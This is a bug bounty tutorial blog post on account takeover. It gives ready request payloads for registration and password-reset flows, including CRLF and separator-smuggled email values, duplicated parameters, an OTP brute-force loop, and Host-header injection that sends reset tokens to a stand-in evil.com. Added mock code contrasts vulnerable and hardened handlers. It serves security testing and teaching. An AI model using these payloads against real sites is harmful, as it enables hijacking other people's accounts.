
Bug Bounty: Trick to Find Account Takeover and GET BOUNTY

Welcome to our guide to bug bounty hunting with a focus on account takeover. In a cybersecurity landscape that keeps changing, staying a step ahead of potential vulnerabilities is crucial. In this article we dive into a variety of techniques that revolve around account takeover vulnerabilities, with a special emphasis on "email replacing" during the account registration process.

We'll also explore parameter pollution in password reset functionality, OTP code brute force, Host header injection, and the use of separators within parameter values, among other tactics.

Throughout this guide, we’ll provide you with real-world examples and break down the mechanics behind each technique. Our goal is to arm you with the knowledge and insights necessary to not only identify and understand these vulnerabilities, but also to ethically report them and contribute to a safer digital ecosystem.

So, whether you’re someone looking to explore the exciting world of ethical hacking or a dedicated security enthusiast, keep reading to elevate your bug bounty skills and play a vital role in ensuring online security.

 

1. Account Takeover Through Email Replacing When Registering an Account (testing the email filter for abuse)

Register with a value that contains the victim's address plus extra characters, or both the victim's address and your own, and watch which address the application validates, which one it stores, and which one receives the verification or reset mail. Single-address payloads (the victim's address with leading or trailing control characters) test whether the "already registered" check compares the raw string while the stored value is normalised; two-address payloads test whether the filter accepts the value as a single address while storage or mail delivery splits it into two. The addresses below are placeholders: victim@example.com is the account you are targeting, attacker@example.com is yours.

Example:

victim@example.com,attacker@example.com
email@email","attacker@example.com
victim@example.com:attacker@example.com
victim@example.com%0d%0aattacker@example.com
%0d%0avictim@example.com
%0avictim@example.com
victim@example.com%0d%0a
victim@example.com%0a
victim@example.com%0d
victim@example.com%00
victim@example.com{{}}

Example Request:

name=HACKER&email=victim@example.com&email=attacker@example.com&username=hackerz&password=THIS_ISPASSWORD_TO_TAKEOVER&password-confirmation=THIS_ISPASSWORD_TO_TAKEOVER&_csrf_token=XXX7139a5209c08aec2dbff06f5ab5XXXXXXXXXX

2. Account Takeover Through Parameter Pollution in Reset Password

Send the email parameter twice, once with the victim's address and once with yours. If the code that looks up the account and the code that addresses the email read different copies of the parameter (first versus last, or the whole list), the reset token for the victim's account can arrive in your inbox.

Example:

POST /passwordReset
[...]
email=victim@example.com&email=attacker@example.com

or in JSON:

{"email":["victim@example.com","attacker@example.com"]}
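The following is an added example, not code from the original post: a mock of a reset handler in which the account lookup and the mailer read the duplicated parameter differently, next to a hardened version that insists on exactly one string value. The addresses, the user store and the two-layer behaviour of the vulnerable handler are assumptions for the demonstration.

```python
import json
import secrets
from urllib.parse import parse_qs, parse_qsl

# Constructed placeholders, not from the original post.
VICTIM = "victim@example.com"
ATTACKER = "attacker@example.com"
USERS = {VICTIM}                      # only the victim has an account


def vulnerable_reset(body, content_type="application/x-www-form-urlencoded"):
    """Two layers read the same parameter differently: the account lookup
    takes the first copy, the mailer accepts every copy as a recipient."""
    if content_type == "application/json":
        value = json.loads(body)["email"]
        recipients = value if isinstance(value, list) else [value]
        lookup = recipients[0]
    else:
        lookup = parse_qs(body)["email"][0]                    # first copy
        recipients = [v for k, v in parse_qsl(body) if k == "email"]  # all copies
    if lookup not in USERS:
        return {"status": "no such user"}
    return {"status": "sent", "account": lookup,
            "token": secrets.token_urlsafe(16), "mail_to": recipients}


def hardened_reset(body, content_type="application/x-www-form-urlencoded"):
    """Exactly one string value, and the same value for lookup and delivery."""
    if content_type == "application/json":
        value = json.loads(body).get("email")
        values = [value] if isinstance(value, str) else []
    else:
        values = parse_qs(body).get("email", [])
    if len(values) != 1:
        return {"status": "rejected"}            # duplicated or missing parameter
    email = values[0]
    if email not in USERS:
        return {"status": "sent", "mail_to": []}  # same status either way
    return {"status": "sent", "account": email,
            "token": secrets.token_urlsafe(16), "mail_to": [email]}


if __name__ == "__main__":
    body = f"email={VICTIM}&email={ATTACKER}"
    print("vulnerable:", vulnerable_reset(body))
    print("hardened:  ", hardened_reset(body))
```

The mismatch is the whole bug: parse_qs keeps a list of every value, parse_qsl yields the pairs in order, and a framework's convenience accessor may return the first or the last of them. When testing, vary both the order of the two copies and the content type, because the layer that wins differs between stacks.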

 

3. Account Takeover Through OTP Code Bruteforce

If the reset code is short and numeric and the endpoint neither limits attempts nor expires the code after a few failures, you can iterate over the whole code space.

Example:

POST /reset
[...]
email=victim@example.com&code=$12345$

You can use Burp Intruder: mark the code value (shown as $12345$ above) as the payload position and use a numeric payload set that covers the full range, zero-padded to the code length. Check first whether a wrong guess invalidates the current code or triggers a lockout; if it does, brute force will not get you in.
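As an added example (not the original post's code), here is a mock of a code store that behaves like the vulnerable target when no attempt limit is set and locks the code after a few failures otherwise, together with the brute-force loop that Intruder would run. The code length, the lockout threshold and the address are assumptions.

```python
import hmac
import secrets

VICTIM = "victim@example.com"   # constructed placeholder


class ResetCodes:
    """Mock of a /reset endpoint's code store. With max_attempts=None it
    behaves like the vulnerable target; with a small limit it locks the code."""

    def __init__(self, digits=5, max_attempts=None):
        self.digits = digits
        self.max_attempts = max_attempts
        self.codes = {}          # email -> [code, failed_attempts]

    def issue(self, email, code=None):
        if code is None:
            code = f"{secrets.randbelow(10 ** self.digits):0{self.digits}d}"
        self.codes[email] = [code, 0]
        return code              # really sent by mail; returned here for the demo

    def verify(self, email, guess):
        entry = self.codes.get(email)
        if entry is None:
            return False
        if self.max_attempts is not None and entry[1] >= self.max_attempts:
            return False         # locked out: the code is dead even if guessed
        if hmac.compare_digest(entry[0], guess):   # constant-time comparison
            del self.codes[email]                  # single use
            return True
        entry[1] += 1
        return False


def intruder_payloads(digits):
    """The zero-padded payload set Burp Intruder would iterate for $12345$."""
    return (f"{n:0{digits}d}" for n in range(10 ** digits))


def brute_force(store, email, digits):
    """Returns (code, requests_made) on success, (None, 10**digits) when the
    whole range was tried without a hit (locked out or wrong assumptions)."""
    for i, guess in enumerate(intruder_payloads(digits), 1):
        if store.verify(email, guess):
            return guess, i
    return None, 10 ** digits


if __name__ == "__main__":
    weak = ResetCodes(digits=4)
    weak.issue(VICTIM)
    print("no limit:", brute_force(weak, VICTIM, 4))
    strict = ResetCodes(digits=4, max_attempts=5)
    strict.issue(VICTIM)
    print("5 attempts:", brute_force(strict, VICTIM, 4))
```

A 5-digit code is at most 100,000 requests; at a modest request rate that is minutes, which is why the attempt counter (or a code that expires after a few failures) is the control that matters, not the code length alone.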

 

4. Account Takeover Through Host Header Injection

Example:

POST /reset
Host: evilsite.com
[...]
email=victim@example.com

POST /reset
Host: target.com
X-Forwarded-Host: evil.com
[...]
email=victim@example.com

If the application builds the reset link from the Host (or X-Forwarded-Host) header instead of a configured base URL, the victim receives a reset email whose link points at evilsite.com with the token in it. When the victim clicks the link, the token is written to the attacker's server log and can be replayed against the real site before it expires. Test with your own address first so you can see what the generated link looks like, and remember that this only succeeds if the victim actually clicks.

 

5. Account Takeover Through Using a Separator in the Parameter Value

Put the victim's address and yours in one value, joined by a character that the validator may tolerate but that the mail layer or the database treats as a delimiter.

Example:

POST /PWreset
[...]
email=victim@example.com,attacker@example.com

POST /PWreset
[...]
email=victim@example.com%20attacker@example.com

POST /PWreset
[...]
email=victim@example.com|attacker@example.com

POST /PWreset
[...]
email=victim@example.com%00attacker@example.com

 

6. Try an Email Without a Domain in the Parameter Value

Example:

POST /registeraccount
[...]
email=victimemail

 

7. Try an Email Without a TLD in the Parameter Value

Example:

POST /reset
[...]
email=victim@example

The second variant is a different test: a CRLF sequence followed by a cc: header, which targets applications that build the outgoing mail headers directly from the parameter value.

POST /reset
[...]
email=victim@example.com%0a%0dcc:attacker@example.com

 

8. Try Re-Signing Up Using the Same Email

Example:

POST /newaccount
[...]
email=victim@example.com&password=1234

After signing up with the victim's email, sign up again with a different password:

POST /newaccount
[...]
email=victim@example.com&password=yourehacked

If the second request succeeds and the new password logs you in, the sign-up handler overwrites existing accounts instead of rejecting duplicates.

 

9. If There Is JSON Data in the Request, Add a Comma and Your Email

Example:

POST /newaccount
[...]
{"email":"victim@example.com","attacker@example.com","token":"xxxxxxxxxx"}

This body is not valid JSON (the second string has no key), so a strict parser rejects it outright; it only pays off against a back end whose parser is lenient. Where the parser is strict, try the array form from section 2 or the same key twice instead.
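An added example, not the original post's code, of how a back end's JSON parser shapes this trick: the comma payload fails to parse at all, an array or a duplicated key parses but leaves "email" ambiguous, and plain json.loads silently keeps the last duplicate. The classification labels are assumptions for the demonstration.

```python
import json


class DuplicateKey(ValueError):
    """Raised by the strict parser when an object repeats a key."""


def _reject_duplicates(pairs):
    seen = {}
    for key, value in pairs:
        if key in seen:
            raise DuplicateKey(key)
        seen[key] = value
    return seen


def parse_strict(body):
    """json.loads that refuses duplicate keys instead of keeping the last one."""
    return json.loads(body, object_pairs_hook=_reject_duplicates)


def classify_email(body):
    """'invalid' if the body is not JSON at all (the comma trick), 'ambiguous'
    if 'email' is a list, duplicated, missing or not a string, 'one' otherwise."""
    try:
        data = parse_strict(body)
    except DuplicateKey:
        return "ambiguous"
    except json.JSONDecodeError:
        return "invalid"
    if not isinstance(data, dict) or not isinstance(data.get("email"), str):
        return "ambiguous"
    return "one"


def lenient_email(body):
    """What a back end using plain json.loads sees: the last duplicate wins,
    and an unparseable body yields nothing."""
    try:
        data = json.loads(body)
    except json.JSONDecodeError:
        return None
    return data.get("email") if isinstance(data, dict) else None


if __name__ == "__main__":
    for body in ('{"email":"victim@example.com","attacker@example.com","token":"xxxxxxxxxx"}',
                 '{"email":["victim@example.com","attacker@example.com"]}',
                 '{"email":"victim@example.com","email":"attacker@example.com"}'):
        print(classify_email(body), lenient_email(body), body)
```

The duplicate-key variant is the one to watch on the defensive side: the JSON specification leaves its handling to the implementation, so a validating layer and the application layer may disagree on which value is "the" email, which is exactly the split that section 2 exploits for form parameters.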

 

CLOSING

These account takeover tricks were collected from various sources, one of them being daffainfo. Among them are a few that I have personally attempted and successfully executed. I'm optimistic that you'll achieve success with them as well, someday.

-SECRY

Christin, https://secry.me/explore
A cybersecurity practitioner with more than 5 years of experience in the cybersecurity world. Has an interest in creating simple blog websites, learning about SEO and graphic design, writing, AI, and understanding the concepts of journalism. Intentionally created this website to make the world of cybersecurity more engaging by combining it with journalistic principles and presenting cybersecurity stories that are easy to understand, which can help anyone who wants to develop in the cybersecurity world.
